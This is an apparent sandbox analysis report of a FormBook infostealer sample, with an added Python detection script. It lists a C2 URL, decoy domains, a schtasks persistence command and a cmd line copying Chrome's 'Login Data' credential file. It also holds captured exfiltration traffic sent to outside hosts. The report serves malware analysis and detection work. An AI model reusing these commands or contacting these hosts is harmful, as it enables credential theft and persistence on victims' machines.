
Analysis Report MOe7vYpWXW.exe

Overview

General Information

Sample Name: MOe7vYpWXW.exe
Analysis ID: 404125
MD5: 106ada585df884b13cd6a8a71e404c78
SHA1: 470e8dd108972fe65c027b9d4856aa365b69fd9e
SHA256: 612d1888d98714893e69c4649a46a990c9c26367834d5be5afc05df15e913572
Tags: AgentTesla, exe (the tags do not match the detection result below, which is FormBook)

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • MOe7vYpWXW.exe (PID: 6820 cmdline: 'C:\Users\user\Desktop\MOe7vYpWXW.exe' MD5: 106ADA585DF884B13CD6A8A71E404C78)
    • schtasks.exe (PID: 7132 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fendlKCsOIoiN' /XML 'C:\Users\user\AppData\Local\Temp\tmpC79C.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MOe7vYpWXW.exe (PID: 1740 cmdline: C:\Users\user\Desktop\MOe7vYpWXW.exe MD5: 106ADA585DF884B13CD6A8A71E404C78)
    • MOe7vYpWXW.exe (PID: 5940 cmdline: C:\Users\user\Desktop\MOe7vYpWXW.exe MD5: 106ADA585DF884B13CD6A8A71E404C78)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6720 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • systray.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6844 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
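The process tree above is exactly the telemetry an EDR or Sysmon pipeline records, and the Sigma section of this report shows no rule matched it. As an added example (not part of the report), the Python below runs four process-creation rules over constructed events that mirror the tree: the PIDs, images and command lines are the report's; the parent PID of the first MOe7vYpWXW.exe process (1000) and the full path of explorer.exe are assumptions.

```python
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """A process-creation event (Sysmon event 1 / Windows 4688 style), reduced to what the rules need."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the Startup tree of the report. PIDs, images and
# command lines are the report's; PPID 1000 of the first sample process and the
# explorer.exe path are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(6820, 1000, r"C:\Users\user\Desktop\MOe7vYpWXW.exe",
              r"'C:\Users\user\Desktop\MOe7vYpWXW.exe'"),
    ProcEvent(7132, 6820, r"C:\Windows\System32\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fendlKCsOIoiN' "
              r"/XML 'C:\Users\user\AppData\Local\Temp\tmpC79C.tmp'"),
    ProcEvent(7140, 7132, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1740, 6820, r"C:\Users\user\Desktop\MOe7vYpWXW.exe",
              r"C:\Users\user\Desktop\MOe7vYpWXW.exe"),
    ProcEvent(5940, 6820, r"C:\Users\user\Desktop\MOe7vYpWXW.exe",
              r"C:\Users\user\Desktop\MOe7vYpWXW.exe"),
    ProcEvent(3424, 5940, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(6720, 3424, r"C:\Windows\SysWOW64\autochk.exe", r"C:\Windows\SysWOW64\autochk.exe"),
    ProcEvent(6808, 3424, r"C:\Windows\SysWOW64\systray.exe", r"C:\Windows\SysWOW64\systray.exe"),
    ProcEvent(6844, 6808, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' "
              r"'C:\Users\user\AppData\Local\Temp\DB1' /V"),
    ProcEvent(6840, 6844, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: [rule names]} for every process that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)

    hits: Dict[int, List[str]] = defaultdict(list)
    for e in events:
        name = _base(e.image)
        cmd = e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        pname = _base(parent.image) if parent else ""

        # 1. Persistence: schtasks /Create importing a task definition dropped in %Temp%.
        if (name == "schtasks.exe" and "/create" in cmd and "/xml" in cmd
                and re.search(r"\\appdata\\local\\temp\\", cmd)):
            hits[e.pid].append("schtasks_xml_from_temp")

        # 2. Credential access: cmd.exe copying the Chromium "Login Data" SQLite store
        #    out of the profile (the stealer reads the copy to dodge the browser's lock).
        if name == "cmd.exe" and re.search(r"\bcopy\b.*\\login data", cmd):
            hits[e.pid].append("copy_browser_login_data")

        # 3. The sample launching its own image again: typical of hollowing a fresh
        #    copy of itself. Low confidence on its own (browsers and updaters self-spawn).
        if parent and parent.image.lower() == e.image.lower():
            hits[e.pid].append("self_spawn")

        # 4. explorer.exe starting a 32-bit system binary from SysWOW64 (autochk.exe,
        #    systray.exe) that it has no business launching; escalate when that
        #    binary in turn spawns cmd.exe.
        if pname == "explorer.exe" and "\\syswow64\\" in e.image.lower():
            hits[e.pid].append("wow64_binary_under_explorer")
            if any(_base(c.image) == "cmd.exe" for c in children[e.pid]):
                hits[e.pid].append("wow64_binary_spawns_cmd")
    return dict(hits)


if __name__ == "__main__":
    for pid, rules in sorted(detect(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(rules))
```

Rules 1 and 2 are precise enough to page on; rule 3 is only corroboration, and rule 4 needs the parent-child context (explorer.exe with no prior user action) that a single-event rule cannot see, which is why the function walks the whole tree rather than scoring events one at a time.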

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mvcsecrets.com/op9s/"], "decoy": ["uscoser.club", "gustrad.com", "sowftwer.com", "psychicpatrol.com", "lmouowgoaa.com", "riandmoara.com", "sushigardentogo.com", "cannabimall.com", "ecolodgesworld.com", "mysandboxcsp.com", "coxsmobility.com", "sfs-distribution.info", "tymict.com", "u-bahn.online", "chrisjohnsondrums.com", "comfyscoffee.com", "eastwoodlearningcenter.com", "a-authenticate.com", "greatroyalspices.com", "legalparaprofessionalonline.com", "cnn24.site", "servinguprichard.com", "kongtiaodz.com", "priminerw.com", "intrateknik.com", "arabiangulfgames.com", "berkona.com", "herbaquni.com", "aluarte.info", "wuxkfowev.icu", "digitalneeds.tech", "practisepractice.com", "upgradeindonesia.com", "designinject.com", "chinahousecoralville.com", "clubliakinder.com", "sialkot.city", "evgreen.fund", "crg-construction.com", "rikrakprod.com", "classsnk.com", "e-motionaligner.com", "beautyblissshops.com", "pickyourprice.club", "kraekratom.com", "digitexz.online", "drburcindemirel.com", "thisislisauser.com", "bridge-the-mind.net", "skincodemtblo.com", "elayathemodel.com", "reinboge.net", "banks-in-cambodia.com", "earthkeepforum.com", "vbyvictorious.com", "vyne.net", "bearring.info", "jndaohang.com", "iandautomation.com", "puteraizman.com", "earthlyangelshomecare.com", "jumlasx.xyz", "holdergear.com", "bmwsns.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x102ce0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x102f4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12f500:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12f76a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x10ea6d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b28d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x10e559:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13ad79:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x10eb6f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b38f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x10ece7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13b507:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x103962:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x130182:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x10d7d4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x139ff4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x10465b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x130e7b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1148df:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1410ff:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1158f2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x111801:$sqlite3step: 68 34 1C 7B E1
    • 0x111914:$sqlite3step: 68 34 1C 7B E1
    • 0x13e021:$sqlite3step: 68 34 1C 7B E1
    • 0x13e134:$sqlite3step: 68 34 1C 7B E1
    • 0x111830:$sqlite3text: 68 38 2A 90 C5
    • 0x111955:$sqlite3text: 68 38 2A 90 C5
    • 0x13e050:$sqlite3text: 68 38 2A 90 C5
    • 0x13e175:$sqlite3text: 68 38 2A 90 C5
    • 0x111843:$sqlite3blob: 68 53 D8 7F 8C
    • 0x11196b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x13e063:$sqlite3blob: 68 53 D8 7F 8C
    • 0x13e18b:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 further memory-dump rule matches not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.MOe7vYpWXW.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.MOe7vYpWXW.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.MOe7vYpWXW.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
6.2.MOe7vYpWXW.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.MOe7vYpWXW.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE rule match not shown)

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
Source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\fendlKCsOIoiN.exe | ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: MOe7vYpWXW.exe | Virustotal: Detection: 21%
Source: MOe7vYpWXW.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\fendlKCsOIoiN.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: MOe7vYpWXW.exe | Joe Sandbox ML: detected
Source: 6.2.MOe7vYpWXW.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: MOe7vYpWXW.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: MOe7vYpWXW.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.930881315.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: MOe7vYpWXW.exe, 00000006.00000002.733964378.00000000013E0000.00000040.00000001.sdmp, systray.exe, 0000000D.00000003.727048193.0000000000E80000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MOe7vYpWXW.exe, systray.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.930881315.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe | Code function: 4x nop then pop edi | 6_2_00417D7C
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi | 13_2_006F6CA1
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi | 13_2_006F7D7C

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.mvcsecrets.com/op9s/
Source: global traffic | HTTP traffic detected: GET /op9s/?ATRlddL=fDbKJpNgWtWNAOf2zOowoHnuaPtf1JEer055tVKXYGTx+PWX8HxpnvRicLt6T6e26FCe&vjlP0v=UDHHm2vhQ0rxBNh HTTP/1.1 | Host: www.reinboge.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /op9s/?ATRlddL=xnspkmSPLBj08xNePaHPPsjxz908h8zfhpai7QtikNAo4s21U/7o4eKTODKz+4ENdtw2&vjlP0v=UDHHm2vhQ0rxBNh HTTP/1.1 | Host: www.riandmoara.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 98.124.204.16
Source: Joe Sandbox View | ASN Name: ENOMAS1US
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.reinboge.netConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.reinboge.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reinboge.net/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 58 68 58 77 58 4f 63 51 53 74 69 53 56 5f 75 6c 72 71 35 37 39 51 37 61 55 63 56 53 33 39 4d 55 35 43 73 73 6f 46 36 6a 51 6e 48 32 76 4d 6d 4b 74 46 46 78 69 36 34 42 41 75 39 30 4a 35 71 55 32 55 32 55 4f 52 4b 66 79 56 55 64 35 6a 48 37 31 6a 58 70 32 79 77 69 43 79 51 69 61 4f 6e 6c 35 41 44 63 35 34 4d 4c 4c 36 4c 48 71 65 79 5f 42 68 4c 30 34 73 53 47 7e 56 6c 66 49 50 33 32 43 54 64 70 62 4e 45 64 53 69 41 4f 4d 2d 4a 2d 78 64 57 7a 79 44 48 50 28 4f 61 48 72 4c 57 47 4a 78 34 55 32 68 74 7a 67 76 7a 75 56 61 7e 4b 31 7a 28 61 77 53 78 47 49 36 51 37 7a 6a 35 51 30 36 5a 49 62 33 6f 72 7a 32 57 56 45 42 5a 75 65 67 6e 36 41 52 6d 4c 39 44 67 6a 4c 6b 6c 49 56 71 59 30 43 6d 28 77 6a 68 79 5f 49 76 49 6e 6c 46 6b 7a 38 45 6f 6b 30 59 66 42 50 44 38 42 45 73 48 48 67 38 54 52 66 45 64 57 52 62 66 74 61 66 35 5a 35 4b 32 70 43 4c 44 4a 77 59 31 76 77 39 58 32 55 63 46 6f 53 46 35 34 57 71 39 31 76 6c 44 57 44 69 67 63 6a 74 44 4a 4c 65 74 32 5a 39 54 51 38 49 4d 7a 36 54 77 37 77 30 58 47 32 4d 4f 70 4f 38 37 46 38 52 45 62 45 65 34 78 4a 62 33 64 64 30 56 75 43 32 76 4b 72 48 54 75 75 70 54 47 6e 53 66 71 48 37 39 77 63 39 34 37 72 30 49 41 7e 65 68 50 55 4b 65 62 6c 51 35 35 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ATRlddL=XhXwXOcQStiSV_ulrq579Q7aUcVS39MU5CssoF6jQnH2vMmKtFFxi64BAu90J5qU2U2UORKfyVUd5jH71jXp2ywiCyQiaOnl5ADc54MLL6LHqey_BhL04sSG~VlfIP32CTdpbNEdSiAOM-J-xdWzyDHP(OaHrLWGJx4U2htzgvzuVa~K1z(awSxGI6Q7zj5Q06ZIb3orz2WVEBZuegn6ARmL9DgjLklIVqY0Cm(wjhy_IvInlFkz8Eok0YfBPD8BEsHHg8TRfEdWRbftaf5Z5K2pCLDJwY1vw9X2UcFoSF54Wq91vlDWDigcjtDJLet2Z9TQ8IMz6Tw7w0XG2MOpO87F8REbEe4xJb3dd0VuC2vKrHTuupTGnSfqH79wc947r0IA~ehPUKeblQ55jA).
          Source: global trafficHTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.reinboge.netConnection: closeContent-Length: 190377Cache-Control: no-cacheOrigin: http://www.reinboge.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reinboge.net/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 58 68 58 77 58 4d 39 6e 65 39 6d 48 66 70 65 6f 71 36 70 4a 33 77 4c 32 5a 36 64 42 7e 4b 34 71 37 51 34 47 6f 46 4b 64 4c 54 69 37 7e 63 57 4b 36 58 64 38 72 36 34 4f 4c 4f 39 7a 4e 35 57 6f 31 43 7a 5a 4f 51 7e 31 79 56 4d 63 32 46 72 2d 30 7a 57 68 35 79 73 30 41 79 56 6b 61 49 6e 51 36 69 76 45 76 6f 41 4c 57 61 54 46 6d 66 6a 39 58 77 33 72 78 38 7e 44 79 30 4e 47 49 5f 4b 57 44 77 68 78 4b 49 63 62 56 56 38 48 51 4f 35 47 31 4d 4f 32 76 69 33 55 6d 35 79 59 6c 4b 62 4e 49 77 34 63 35 46 78 77 69 62 66 73 46 6f 32 43 7e 69 4c 6e 33 53 42 6f 49 39 4e 41 6e 42 39 38 7e 62 46 51 5a 6d 6c 38 30 30 36 58 4c 53 77 7a 61 6a 50 74 47 52 36 30 28 47 63 43 50 30 4a 6e 53 6f 68 5f 4d 6a 71 59 77 77 4f 7a 47 5f 34 70 6a 53 30 72 6d 67 55 4c 78 5a 48 57 55 44 63 4a 51 4b 6d 75 75 38 54 79 64 45 64 73 49 36 65 53 4e 4f 4e 6b 79 35 76 4c 43 4a 6a 61 75 59 49 2d 7a 37 57 64 4c 4d 31 6c 58 31 6c 4f 65 35 6c 6a 72 32 76 64 56 52 39 6a 71 4e 44 42 4c 63 55 34 5a 39 53 72 38 4e 30 5a 36 6d 67 37 68 31 32 61 77 71 47 66 49 38 36 64 36 41 30 5a 4e 4f 46 73 4a 62 28 64 63 45 46 49 54 51 4c 4b 34 45 4c 74 75 4e 48 47 33 53 66 71 62 37 38 4d 53 63 46 56 39 68 64 77 79 4e 6b 6a 55 64 6e 66 68 53 55 53 28 38 59 68 50 51 56 6a 43 77 70 55 38 5f 39 4d 47 71 75 57 56 63 6c 56 41 6a 6c 77 7a 77 79 35 35 56 52 61 61 79 71 43 48 49 28 4b 34 37 42 67 46 4e 54 57 54 72 6f 75 45 63 69 6a 70 74 4f 68 49 36 59 79 4d 77 65 7a 79 6e 6a 64 56 57 6c 4a 6d 7a 48 47 76 44 4f 79 6c 67 62 39 6a 65 6b 6e 4f 31 62 64 73 56 48 63 73 6e 6c 35 57 68 68 41 37 75 
37 48 32 51 4a 41 4e 77 5a 77 33 30 61 50 45 36 33 69 64 75 72 6c 35 59 6e 75 47 64 4f 34 63 42 31 76 58 48 55 49 6a 74 4d 53 52 52 59 48 4b 4d 54 36 44 79 32 44 6e 70 6f 63 6e 37 4a 43 71 68 41 36 45 69 50 33 36 5f 36 63 37 4a 73 67 33 46 4b 6e 77 51 41 67 68 46 7a 70 62 62 7a 56 5a 77 4b 73 50 56 49 79 55 46 31 43 4a 73 44 42 6c 33 30 38 66 4c 72 71 66 4d 64 35 42 65 50 47 52 6f 76 6b 6c 35 69 4e 62 52 41 45 56 78 58 49 53 42 6b 74 59 66 44 6b 54 52 31 4e 43 6f 74 30 76 38 7a 71 59 59 6e 57 69 70 34 72 55 50 4d 4a 76 58 77 54 31 74 49 6f 6b 74 53 59 45 4b 72 47 52 58 64 4f 71 6d 70 4c 28 35 38 4e 52 49 4c 49 32 4b 5a 35 56 6d 41 30 39 7a 6a 56 62 52 6a 5f 66 35 4f 61 69 52 51 69 31 6b 6f 79 77 2d 41 67 53 46 37 37 5a 63 4f 6c 34 64 31 4c 28 63 4f 77 61 39 6e 46 55 61 41 4a 79 47 7e 4a 53 35 4d 62 62 67 73 6f 46 67 69 42 54 63 43 42 70 56 67 78 34 6d 76 62 77 59 4c 48 44 70 77 6d 34 4a 5a 4d 66 2d 4e 57 6e 69 4f 58 50 4c 45 46 47 62 36 30 52 72 7a 64 42 50 28 49 43 5a 58 4c 4f 33 72 52 31 46 30 55 5a 4e 54 36 72 70
          Source: global trafficHTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.riandmoara.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.riandmoara.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.riandmoara.com/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 35 46 67 54 36 44 53 59 41 79 36 44 6b 78 34 71 51 4e 4f 54 5a 49 58 4d 77 74 30 39 6f 75 7a 69 34 70 50 7a 6f 43 5a 2d 71 66 35 73 33 49 6d 76 57 50 71 75 6f 4b 37 7a 5a 52 36 35 6f 4b 45 34 52 65 4a 70 54 57 66 75 71 61 7e 61 77 31 4b 4c 6f 79 47 69 4a 52 7a 57 55 6c 44 4b 49 57 61 4f 42 49 64 7a 4c 31 33 38 76 49 73 64 4e 51 43 37 6f 56 65 74 4e 53 7e 4f 6d 48 53 66 56 61 39 2d 38 4d 62 6b 76 47 52 52 56 4a 75 6e 71 72 4f 36 32 34 63 47 77 36 47 43 42 77 33 6e 65 6e 79 54 57 55 76 78 42 66 32 65 44 5a 38 57 52 41 52 4b 6c 6f 47 65 4b 77 78 38 4b 77 50 44 